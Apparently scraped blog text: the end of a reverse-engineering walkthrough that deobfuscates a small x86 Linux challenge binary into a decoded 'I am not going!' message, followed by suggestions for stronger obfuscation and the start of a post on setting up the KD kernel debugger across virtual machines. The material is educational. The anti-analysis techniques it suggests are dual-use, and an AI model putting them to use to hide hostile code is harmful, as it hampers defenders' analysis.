going-or-not-obf-test1.nasm:78: error: comma, colon or end of line expected

Looking at the lines that have caused the errors:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
[email protected]:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test1.nasm | grep "^[ ]*$i"; done
    16      mov    al,BYTE PTR [esi]
    29      jmp    DWORD PTR [esp]
    47      and    ebp,DWORD PTR gs:[edx]
    49      sub    ebp,DWORD PTR [edx]
    50      sub    DWORD PTR fs:0x654e0d64,esp
    51      and    ebp,DWORD PTR [edx]
    59      mov    BYTE PTR [esp],cl
    63      cmp    BYTE PTR [edx],al
    67      xor    BYTE PTR [edx],bl
    75      mov    cl,BYTE PTR [esi+edx*1]
    78      mov    BYTE PTR [esp],cl

You can see that its all lines that have [SIZE] PTR, we will remove any DWORD PTR and BYTE PTR and for the lines that had BYTE put that before the first operand, so they end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
[email protected]:~# for i in 16 29 47 49 50 51 59 63 67 75 78; do cat -n going-or-not-obf-test2.nasm | grep "^[ ]*$i"; done
    16      mov    BYTE al, [esi]
    29      jmp    [esp]
    47      and    ebp, gs:[edx]
    49      sub    ebp, [edx]
    50      sub    fs:0x654e0d64,esp
    51      and    ebp, [edx]
    59      mov    BYTE [esp],cl
    63      cmp    BYTE [edx],al
    67      xor    BYTE [edx],bl
    75      mov    BYTE cl,[esi+edx*1]
    78      mov    BYTE [esp],cl

Now we try to assemble it again:

1
2
3
[email protected]:~# nasm -felf32 -o going-or-not-obf-test2 going-or-not-obf-test2.nasm  
going-or-not-obf-test2.nasm:47: error: invalid combination of opcode and operands
going-or-not-obf-test2.nasm:50: error: invalid combination of opcode and operands

So there is still a problem with 2 lines, it looks as if these instructions are invalid, this could possibly be data, what we shall do is replace these 2 instructions with the raw opcodes from the disassembly, so our application ends up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

If we assemble this and test it out:

1
2
3
4
[email protected]:~# nasm -felf32 -o going-or-not-obf-test3.o going-or-not-obf-test3.nasm 
[email protected]:~# ld -o going-or-not-obf-test3 going-or-not-obf-test3.o
[email protected]:~# ./going-or-not-obf-test3
Segmentation fault

So it assembles and links now but we get a segmentation fault. Let's investigate why:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
[email protected]:~# gdb -q ./going-or-not-obf-test3
Reading symbols from /root/going-or-not-obf-test3...(no debugging symbols found)...done.
(gdb) r
Starting program: /root/going-or-not-obf-test3 

Program received signal SIGSEGV, Segmentation fault.
0x080480b6 in _start ()
(gdb) x/i $eip
=> 0x80480b6 <_start+86>:   add    BYTE PTR [eax],al
(gdb) print/x $eax
$1 = 0x0
(gdb) disassemble 
Dump of assembler code for function _start:
   0x08048060 <+0>: mov    edx,eax
   0x08048062 <+2>: mov    edi,0x25
   0x08048067 <+7>: jmp    0x80480b6 <_start+86>
   0x0804806c <+12>:    mov    bl,0x32
   0x0804806e <+14>:    pop    esi
   0x0804806f <+15>:    xor    eax,eax
   0x08048071 <+17>:    je     0x80480dc <_start+124>
   0x08048077 <+23>:    mov    bh,0x6a
   0x08048079 <+25>:    call   0x804808e <_start+46>
   0x0804807e <+30>:    mov    cl,0x4
   0x08048080 <+32>:    mov    al,BYTE PTR [esi]
   0x08048082 <+34>:    sub    esp,ecx
   0x08048084 <+36>:    inc    ecx
   0x08048085 <+37>:    xor    al,cl
   0x08048087 <+39>:    xor    ecx,ecx
   0x08048089 <+41>:    cmp    eax,0x4
   0x0804808c <+44>:    je     0x8048099 <_start+57>
   0x08048092 <+50>:    lea    ecx,[ebp-0xf]
   0x08048095 <+53>:    mov    dl,0x10
   0x08048097 <+55>:    jmp    0x8048097 <_start+55>
   0x0804809c <+60>:    xor    ebx,ebx
   0x0804809e <+62>:    xor    ecx,ecx
   0x080480a0 <+64>:    mov    edx,ecx
   0x080480a2 <+66>:    jmp    DWORD PTR [esp]
   0x080480a5 <+69>:    jmp    0x804809e <_start+62>
   0x080480aa <+74>:    lea    ecx,[ebp-0x1b]
   0x080480ad <+77>:    mov    dl,0xc
   0x080480af <+79>:    xor    eax,eax
   0x080480b1 <+81>:    mov    al,0x8
   0x080480b3 <+83>:    mov    ebx,0x4
   0x080480b8 <+88>:    sub    eax,ebx
   0x080480ba <+90>:    sub    ebx,eax
   0x080480bc <+92>:    inc    ebx
   0x080480bd <+93>:    int    0x80
   0x080480bf <+95>:    xor    eax,eax
   0x080480c1 <+97>:    xor    ebx,ebx
   0x080480c3 <+99>:    inc    al
   0x080480c5 <+101>:   int    0x80
---Type <return> to continue, or q <return> to quit---
   0x080480c7 <+103>:   call   0x8048069 <_start+9>
   0x080480cc <+108>:   in     eax,dx
   0x080480cd <+109>:   dec    esi
   0x080480ce <+110>:   and    ebp,DWORD PTR gs:[edx]
   0x080480d1 <+113>:   sub    eax,0x3064232b
   0x080480d6 <+118>:   sub    ebp,DWORD PTR [edx]
   0x080480d8 <+120>:   sub    DWORD PTR fs:0x654e0d64,esp
   0x080480df <+127>:   and    ebp,DWORD PTR [edx]
   0x080480e1 <+129>:   sub    eax,0x2964232b
   0x080480e6 <+134>:   and    eax,0x89ee0d64
   0x080480eb <+139>:   mov    ebp,eax
   0x080480ed <+141>:   mov    al,0xc9
   0x080480ef <+143>:   add    eax,edi
   0x080480f1 <+145>:   jmp    0x8048101 <_start+161>
   0x080480f6 <+150>:   lea    edx,[ebp+0x0]
   0x080480f9 <+153>:   mov    BYTE PTR [esp],cl
   0x080480fc <+156>:   dec    esp
   0x080480fd <+157>:   push   0x80480e9
   0x08048102 <+162>:   test   edx,edx
   0x08048104 <+164>:   cmp    BYTE PTR [edx],al
   0x08048106 <+166>:   je     0x8048070 <_start+16>
   0x0804810c <+172>:   mov    ebx,edi
   0x0804810e <+174>:   add    ebx,0x1f
   0x08048111 <+177>:   xor    BYTE PTR [edx],bl
   0x08048113 <+179>:   dec    edx
   0x08048114 <+180>:   ret    
   0x08048115 <+181>:   xor    ebp,ebp
   0x08048117 <+183>:   xor    ecx,ecx
   0x08048119 <+185>:   xor    edx,edx
   0x0804811b <+187>:   inc    edx
   0x0804811c <+188>:   lea    ebp,[esp+ecx*1]
   0x0804811f <+191>:   mov    cl,BYTE PTR [esi+edx*1]
   0x08048122 <+194>:   cmp    cl,al
   0x08048124 <+196>:   je     0x80480e2 <_start+130>
   0x0804812a <+202>:   mov    BYTE PTR [esp],cl
   0x0804812d <+205>:   sub    esp,0x1
   0x08048130 <+208>:   inc    edx
   0x08048131 <+209>:   mov    esp,esp
   0x08048133 <+211>:   cmp    ecx,0x0
---Type <return> to continue, or q <return> to quit---
   0x08048136 <+214>:   jg     0x804810b <_start+171>
   0x0804813c <+220>:   mov    ebp,ebp
   0x0804813e <+222>:   ret    
End of assembler dump.

So it looks as if we've landed in the middle of an instruction.

Near the start of the application (on line 16 above), it jumps it a certain memory address which is the middle of an instruction. The resulting instruction, as seen on line 9, tries to move a value to the address pointed to by the EAX register.

On line 11 you can see that the value in EAX is 0, which is what caused the segfault, 0 is an invalid memory address.

The reason for this is because the original application jumped to static memory addresses, in the application the memory addresses are different so this will need to be fixed for the application to work.

What we need to do is replace any fixed memory addresses with labels. We can find where in the application the memory addresses are meant to go by looking at the original disassembly.

Once we have done this the resulting application is as follows:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    One
Two:
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     Three
Eight:
    mov    bh,0x6a
    call   Nine
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     Eleven
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    Twelve
Nine:
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
Twelve:
    jmp    Ten
Eleven:
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
Ten:
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
One:
    call   Two
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
Three:
    mov    al,0xc9
    add    eax,edi
    jmp    Four
Six:
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
Seven:
    push   Seven
    test   edx,edx
    cmp    BYTE [edx],al
    je     Eight
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
Four:
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
Five:
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     Six
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     Five
    mov    ebp,ebp
    ret

There are a couple of values here (on lines 55, 59 and 60) which look like memory addresses but they aren't valid memory addresses in the original disassembly so they could just be normal values or, as its in the same section as the invalid instructions, part of some data.

With this done we can test this application:

1
2
3
4
[email protected]:~# nasm -felf32 -o going-or-not-obf-test4.o going-or-not-obf-test4.nasm
[email protected]:~# ld -o going-or-not-obf-test4 going-or-not-obf-test4.o
[email protected]:~# ./going-or-not-obf-test4
I am not going!

So we have our answer, the author is not going :-)

Method 2: The Hard Way

Here we will attempt to understand the application and figure out what the application does without building and running it.

Although you would have needed some understanding of IA32 to do the previous method, obviously you will need a better understanding of it to do this.

The first step would be what we have already done. Well, there would be no need for the ability to assemble the application, or even have a valid nasm file but we would need to replace any known addresses with labels because this will make the disassembly significantly easier to read.

For this will we just use the nasm file above (going-or-not-obf-test4.nasm), just because it will make this post a little shorter :-)

What we do now is follow the control flow of the application and simplfy it as we go by replacing more complex sequencies with less complex 1's or even only 1 instruction in some cases and removing any dead instructions (instructions which have no effect on the application at all) altogether.

This process is manual deobfuscation and can be applied to small sections of applications instead of just full applications like the last method.

Let's start with the first instruction mov edx,eax, this looks like it is a junk line (or dead code) mainly because this is the first instruction of the application, if this was just a code segment instead of a full application this code would be more likely to be meaningful.

The second instruction mov edi,0x25, is also very difficult to quickly determine its usefulness to the application, what we need to do here is take note of the value inside the EDI register.

The next 4 instructions do something interesting, if you follow the control flow of the application and line the instructions sequentially you get:

1
2
3
4
5
6
  jmp    One
One:
  call   Two
Two:
  mov    bl,0x32
  pop    esi

So the 3rd instruction (on line 5) is not related here, and is similar to the previous mov instruction, just make a note that bl contains 0x32.

The other 3 instructions are using a technique used in some shellcode to get the an address in memory when the code might start at a different point in memory.

Its called the JMP-CALL-POP technique and gets the address of the address immediately following the call instruction into the register used in the pop instruction.

Knowing this we can replace the entire code above with:

1
2
  mov    bl,0x32
  mov    esi, One

Let's look at the next 4 instructions:

1
2
3
4
5
  xor    eax,eax
  je     Three
Three:
  mov    al,0xc9
  add    eax,edi

So here, on line 5, we use the EDI register, we zero EAX, set it to 0xc9 (201), adds it to EDI (0x25 or 37) and stores the result in EAX, this series of instructions are what is called constant unfolding where a series of instructions are done to work out the actual required value instead of just assigning the value to begin with.

We could use the opposite, a common compiler optimization constant folding, to decrease the complexity of this code, so these 4 instructions could be replaced by:

1
  mov    eax,0xee

The next 5 instructions are:

1
2
3
4
5
6
  jmp    Four
Four:
  xor    ebp,ebp
  xor    ecx,ecx
  xor    edx,edx
  inc    edx

This set of instructions just sets EBP and ECX to 0 and EDX to 1. Now its obvious that the instrction at the beginning was dead code because EDX hasn't been used at all and now it has been overwritten.

We can rewrite the application so far in a much more simplfied way:

1
2
3
4
5
6
7
8
_start:
  mov    edi,0x25
  mov    bl,0x32
  mov    esi, One
  mov    eax,0xee
  xor    ebp,ebp
  xor    ecx,ecx
  mov    edx,0x1

As you can see, this is much easier to read than the previous code that was jumping about all over the place.

I kept the assignment to EDI (on line 2) there because, although I've removed the need for it in assigning the value of EAX (on line 5), it still might be used in the future.

Also, the assignment to bl (on line 3) still might not be needed but we shall keep it there just incase.

Let's quickly review the state of the registers:

1
2
3
4
5
6
7
EDI = 0x25
BL = 0x32
ESI = (Address of One) One
EAX = 0xee
EBP = 0x0
ECX = 0x0
EDX = 0x1

The register state and code rewrite should be constantly updated as you go through the code.

The next instruction is lea ebp,[esp+ecx*1], which is the same as EBP = ESP + ECX * 1 or EBP = ESP + 0 * 1 or EBP = ESP.

After this instruction we enter the following loop:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
Five:
  mov    BYTE cl,[esi+edx*1]
  cmp    cl,al
  je     Six
  mov    BYTE [esp],cl
  sub    esp,0x1
  inc    edx
  mov    esp,esp
  cmp    ecx,0x0
  jg     Five
  mov    ebp,ebp
  ret

So this first moves a byte at ESI + EDX * 1, which is basically just ESI + EDX, into the cl register. We know at this point the value inside EDX is 1 and that ESI points to some address in the middle of the application, so our loop will start getting data 1 byte after that address.

This byte is them compared with al, which we know is 0xee, and if they are the same execution will jump to Six.

Providing the jump to Six isn't taken, the byte is moved to the top of the stack (which ESP points to), ESP is adjusted accordingly, EDX is incremented by 1 and the loop is rerun.

The mov instruction on line 8 doesn't do anything, dead code which can be removed.

Now we can find all of the data that is being worked on here:

1
4e 65 23 2a 2d 2b 23 64 30 2b 2a 64 29 25 64 0d 4e 65 23 2a 2d 2b 23 64 29 25 64 0d ee

The starting address of this data is 80480bc in the original disassembly, which is 1 byte after the address of the instruction following the call instruction in the jmp-call-pop routine at the start of the application.

It ends with the ee value because this is the point at which the jump to Six is taken.

Also, notice that nowhere here is a 0x0 (or 00) byte, this means that the jg (jump if greater than) instruction on line 10 will always be taken, every byte there is above 0 so the 2 instructions after are dead code and can be removed from the analysis and the jg can be replaced with a jmp.

It is clear that this data, which is sitting in the middle of the application, is being put on the stack for some reason, the lea instruction right before the loop just saved the address pointing to the beginning of the new location of the data on the stack into the EBP register.

We could try to figure out how meaningful this data is now but it would be best to have a look to see what the application does with it first.

Now let's take the jump to Six:

1
2
3
  lea    edx,[ebp+0x0]
  mov    BYTE [esp],cl
  dec    esp

First it loads the address of the data on the stack, currently in EBP, into EDX.

cl, which is currently 0xee, is put onto the stack and ESP is adjusted accordingly.

We then enter into the 2nd loop:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
Seven:
  push   Seven
  test   edx,edx
  cmp    BYTE [edx],al
  je     Eight
  mov    ebx,edi
  add    ebx,0x1f
  xor    BYTE [edx],bl
  dec    edx
  ret

This is a very unusual loop, you will only see this type of code when reversing obfuscated code.

It started by pushing its own address to the stack, this allows the ret on line 10 to return to Seven.

The test instruction on line 3 is dead code because all test does is set EFLAGS, but they are immediately overwritten by the cmp instruction that follows.

Lines 4 and 5 again test the value of a byte in the data, this time pointed to by EDX, against 0xee and jump's to Eight when its reached.

The next 2 instructions, lines 6 and 7, move the value from EDI into EBX and add's 0x1f to it. We already know that 0x25 is currently in EDI, so EBX = 0x25 + 0x1f or EBX = 0x44.

The byte in the data is then xor'd with bl (or 0x44) and EDX is decremented.

Clearly this is a simply xor encoding of the data, I wrote a python script a while ago to xor a number of bytes with 1 byte and output both the resulting bytes as ascii characters, and the same but with the characters reversed (due to little endian architectures), here is the script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#!/usr/bin/env python

import sys

string = sys.argv[1]
xor = sys.argv[2]
decoded = ""

for c in string:
    decoded += chr(ord(c) ^ ord(xor))


print "String as is:"
print decoded

print "\n\nString reversed:"
print decoded[::-1]

This script is very simple, 1 thing to bare in mind though is that, because we are dealing with data outside of the printable ascii range (0x20 - 0x7e), we can just type the characters on the command line.

So we run the script like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[email protected]:~# python xor-and-ascii.py $(python -c 'print "\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x30\x2b\x2a\x64\x29\x25\x64\x0d\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x29\x25\x64\x0d"') $(python -c 'print "\x44"')
String as is:

!gniog ton ma I
!gniog ma I


String reversed:
I am going!
I am not going!

So now we know what that data is in the middle of the application, clearly it was done like this to confuse but we have reversed enough of the application now to figure out what this is.

With this is mind, we no longer need those 2 loops, or any of the code aimed at moving and decoding the data, we can simply put it in as is.

Let's review our rewritten application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
_start:
  mov    edi,0x25
  mov    esi,One
  mov    ebp,not+0xf
  mov    ebx,0x44
  mov    ecx,0xee
  mov    eax,ecx
  mov    edx,am
One:
  db 0xed
  am: db "I am going!",0xa
  not: db "I am not going!",0xa

I have obviously removed most of the code because it simply isn't needed now, I've made sure that EBP still points to the end of the data and EDX to the beginning just incase there is some reason for this, but most of the code so far was devoted to decoding the data which is no longer needed.

Now for the registers:

1
2
3
4
5
6
7
EDI = 0x25
EBX = 0x44
ESI = (Address of One) One
EAX = 0xee
EBP = (Address of the end of the data) not+0xf
ECX = 0xee
EDX = (Address of the beginning of the data) am

The next 5 instructions show another weird use of call and jmp:

1
2
3
4
5
6
7
8
Eight:
  mov    bh,0x6a
  call   Nine
Nine:
  xor    ebx,ebx
  xor    ecx,ecx
  mov    edx,ecx
  jmp    [esp]

Firstly there is an assignment to bh (the second 8 bits of the EBX register) but then, on line 5, the whole EBX register is cleared using xor so line 2 is dead code.

The call instruction on line 3 and the jmp instruction on line 8 seem to be used just to confuse the reverser, there is no reason for this, but bare in mind that this would have stuck 4 bytes on the stack, next to the decoded data, which hasn't been cleaned up (this could effect the application in some way).

The rest of this code just zero's out EBX, ECX and EDX.

The next 8 instructions are very interesting:

1
2
3
4
5
6
7
8
  mov    cl,0x4
  mov    BYTE al, [esi]
  sub    esp,ecx
  inc    ecx
  xor    al,cl
  xor    ecx,ecx
  cmp    eax,0x4
  je     Eleven

Lines 1 and 3 fix the value of ESP after the call, jmp sequence earlier.

The rest xor's 0x5 with the byte at One and compares the result with 0x4. We can test this out in python, we know the byte at One is 0xed, so:

1
2
3
4
5
6
7
8
[email protected]:~# python
Python 2.7.3 (default, Mar 14 2014, 11:57:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = "\xed"
>>> b = "\x05"
>>> hex(ord(a) ^ ord(b))
'0xe8'

This isn't equal to 0x4 so the jump on line 8 will not be taken.

The next instruction lea ecx,[ebp-0xf] loads EBP - 16 into ECX, ECX will now point to somewhere in the middle of the data (it will actually point 16 characters from the end, which is the start of the string I am not going!).

We can probably guess at what this is going to do from here but let's finish the analysis.

0x10 is then loaded into EDX and then 2 unconditional jumps are taken:

1
2
3
  jmp    Twelve
Twelve:
  jmp    Ten

The only reason for these jumps is to confuse the reverser, we can just ignore them.

The next 7 lines is a very important part of the application:

1
2
3
4
5
6
7
  xor    eax,eax
  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

So lines 1-4 set EAX to 0x4, lines 5 and 6 set EBX to 0x1 and then the interrupt *0x80 is initiated.

Interrupt 0x80 is a special interrupt which initiates a system call, the system call number has to be stored in EAX, which is 0x4 at this moment in time.

We can figure out what system call this is:

1
2
[email protected]:~# grep ' 4$' /usr/include/i386-linux-gnu/asm/unistd_32.h 
#define __NR_write 4

This makes sense, the prototype for this syscall is:

1
ssize_t write(int fd, const void *buf, size_t count);

Each of the arguments go in EBX, ECX and EDX. So to write to stdout, EBX should be 1 which it is.

ECX should point to the string, which it currently points to I am not going!, and EDX should contain the number of characters to print which it does.

The last 4 instructions just run another syscall, exit, you can check this yourself if you wish:

1
2
3
4
  xor    eax,eax
  xor    ebx,ebx
  inc    al
  int    0x80

Obviously we can now wrtie this in a much simpler way, but there is no need, we know exactly what this application does and how it does it.

Improving Obfuscation

As I mentioned earlier, the obfuscation could have been done better to make the reversing process harder. I actually purposefully made the obfuscation weaker than I could have to make the challenge easier.

Inserting more junk data inbetween some instructions could make the static disassembly significantly more difficult to read and understand.

I have to actually add a byte (0x89) at the end of the data section because the next few instructions were being obfuscated in a way that made them unreadable:

1
2
3
4
5
6
 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   c5 b0 c9 01 f8 eb       lds    esi,FWORD PTR [eax-0x1407fe37]
 80480e0:   1f                      pop    ds
 80480e1:   8d 55 00                lea    edx,[ebp+0x0]
 80480e4:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e7:   4c                      dec    esp

The disassembly shown here has had the last byte of the data removed and is the last line of the data section; and a few lines after.

As you can see the byte following the data section has been moved to the data section and as a result the next few instructions have been incorrectly disassembled.

This method can be implemented throughout the whole application, making most of the instructions disassemble incorrectly.

Constant unfolding could be improved here, for instance:

1
2
3
4
5
6
  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

Could be rewritten to:

1
2
3
4
5
6
7
8
9
  push 0xff7316ca
  xor [esp], 0x8ce931
  mov eax, 0xffffffff
  sub eax, [esp]
  push eax
  shl [esp], 0x4
  sub [esp], 0x3f
  pop ebx
  int 0x80

They both do the same thing but the second is a little harder to read, you could obviously keep extending this by implementing more and more complex algorithms to work out your required value.

This can also be applied to references to memory addresses, for instance, if you want to jump to a certain memory address, do some maths to work out the memory address before jumping there.

More advanced instructions could be used like imul, idiv, cmpsb, rol, stosb, rep, movsx, fadd, fcom... The list goes on...

The MMX and other unusual registers could have been taken advantage of.

Also, the key to decrypt the data could have been a command line argument or somehow retreived from outside of the application, this way it would have been extremely difficult decode the data.

Conclusion

There are sometimes easier ways to get a result other than reversing the whole application, maybe just understanding a few bits might be enough.

Although there are ways to make the reversers job more difficult, its never possible to make it impossible to reverse, providing the reverser is able to run the application (if the CPU can see the instructions, then so can the reverser).

A good knowledge of assembly is needed to do any type of indepth reverse engineering.

Further Reading

Reversing: Secrets of Reverse Engineering by Eldad Eilam

Intel® 64 and IA-32 Architectures Developer's Manual

✇eXploit

Usermode Application Debugging Using KD

By: 0xe7

I have started the Windows kernel hacking section with a simple explaination of the setup and a quick analysis of the crackme, that we analysed here, using the kd.exe kernel debugger.

I chose to do this instead of any actual Windows kernel stuff because its a steep learning experience learning how to use KD so its probably best to look at something you have already seen.

Setting Up The Environment

For this post I will be using a total of 4 machines, 3 virtual machines using VMware Player (you probably could use Virtualbox for this also though) hosted on a reasonably powerful machine and a laptop.

You can however do all of this with just 1 physical machine, hosting 1 virtual machine and I will explain the differences in the setup afterwards but I'll first explain the setup I am using.

Here is a visual representation of the network:

So I have 3 virtual machines on my machine running VMware Player:

1 Kali Linux, 1 Windows XP Professional and 1 Windows 7 Home Edition. All 3 of these are 32bit, although it doesn't matter but to follow along you would probably want the debuggee (the Windows 7 machine in my setup) to be 32bit. In my 2 machine setup described below the host (and debugger) is a Windows 7 64bit machine.

The Kali machine has 2 network interfaces, 1 setup in Bridged mode (so that I can SSH directly to it):

And the other setup in Host-only mode (So that it has access to the other 2 machines):

The Windows XP machine has 1 network interface setup in Host-only mode:

And the same for the Windows 7 machine:

The Windows XP and Windows 7 machines are also connected via a virtual serial cable, this is for the debugger connection.

The Windows XP machine will be the client (or the debugger):

And the Windows 7 machine will be the server (or the debuggee):

The Windows 7 machine needs both Visual Studio Express 2013 for Windows Desktop and the Windows Driver Kit (WDK) installed on it. You can get them both here.

The Windows XP machine needs Microsoft Windows SDK for Windows 7 installed, which you can get here. To install this you need to install the full version of Microsoft .NET Framework 4, which you can get here (Bare in mind that you might need an internet connection while you install these so just change the network adaptor configuration to NAT and then once it is installed change it back to Host-only again).

If the debugger is a Windows 7 machine then you will need to install the same software as on the debuggee.

Once these are installed, its best to add the path to the kd.exe application to the PATH variable.

You do this by going in to the properties of My Computer and, on Windows 7 going to Advanced system settings->Environment Variables... or on Windows XP going to Advanced->Environment Variables... and scroll down the Path and click Edit.

The path on Windows 7 should be something like C:\Program Files\Windows Kits\8.1\Debuggers\x86 and on Windows XP C:\Program Files\Debugging Tools for Windows (x86).

For remote administration I've installed TightVNC on both of the Windows machines.

I set it up with access through a Kali machine so that I can setup SSH tunnels and get VNC access to the Windows machines without giving them access to the outside network.

After TightVNC is up and running on your Windows machines, you can setup the SSH tunnels like this (For this explaination we'll imagine that the Windows XP machine is on the VMware virutal network with an IP of 172.16.188.130, the Windows 7 machine is on 172.16.188.131 and that our Kali machine is also on this network):

1
2
[email protected]:~# ssh -f [email protected] -L 5900:172.16.188.130:5900 -N
[email protected]:~# ssh -f [email protected] -L 5901:172.16.188.131:5900 -N

Now if you VNC to 127.0.0.1 you will have access to the Windows XP machine and to 127.0.0.1:1 you will have access to the Windows 7 machine.

1 VM Setup

You can also setup this up with 2 machines, the VMware host (running Windows, which will be the debugger) and the VMware guest (also running Windows, which will be the debuggee).

The serial port configuration for the debuggee in VMware in this setup should look like this:

Notice the different file path and name for Windows, the other end should be set to The other end is an application and Yeild CPU on poll should be checked.

The only other thing that is different is the command you will use to launch KD on the debugger (we haven't got to that but it is shown below for my 4 machine setup), you should instead use kd -k com:port=\\.\pipe\com_1,pipe.

Using KD

On Windows 7 (the debuggee) you will need to tell it to lanuch the debugger on boot, for this you need to run an Administrator command prompt and:

1
2
3
4
5
C:\Windows\system32>bcdedit /dbgsettings SERIAL DEBUGPORT:2 BAUDRATE:115200
The operation completed successfully.

C:\Windows\system32>bcdedit /debug on
The operation completed successfully.

The DEBUGPORT:2 option here is the port number of the COM port that you are going to use, for me it was COM2 hence the number 2.

Now we launch the kernel debugger on the Windows XP machine (this is the command that is different on the 2 machine setup):

1
2
3
4
5
6
7
C:\Documents and Settings\User>kd -k com:port=1,baud=115200

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\com1
Waiting to reconnect...

Again the port=1 option here is the COM port that you are going to be using, I will be using COM1 on this machine hence the 1.

Then reboot the Windows 7 machine and watch the KD terminal on the Windows XP machine:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
Connected to Windows 7 7601 x86 compatible target at (Fri Sep 26 14:43:59.625 20
14 (UTC + 1:00)), ptr64 FALSE
Kernel Debugger connection established.
Symbol search path is: SRV*C:\websymbols*http://msdl.microsoft.com/download/symb
ols
Executable search path is:
Windows 7 Kernel Version 7601 (Service Pack 1) MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.18409.x86fre.win7sp1_gdr.140303-2144
Machine Name:
Kernel base = 0x82814000 PsLoadedModuleList = 0x8295d5b0
Debug session time: Sun Dec 29 22:42:59.976 1985 (UTC + 1:00)
System Uptime: 0 days 0:02:14.490

Now run the crackme application on the debuggee (Windows 7):

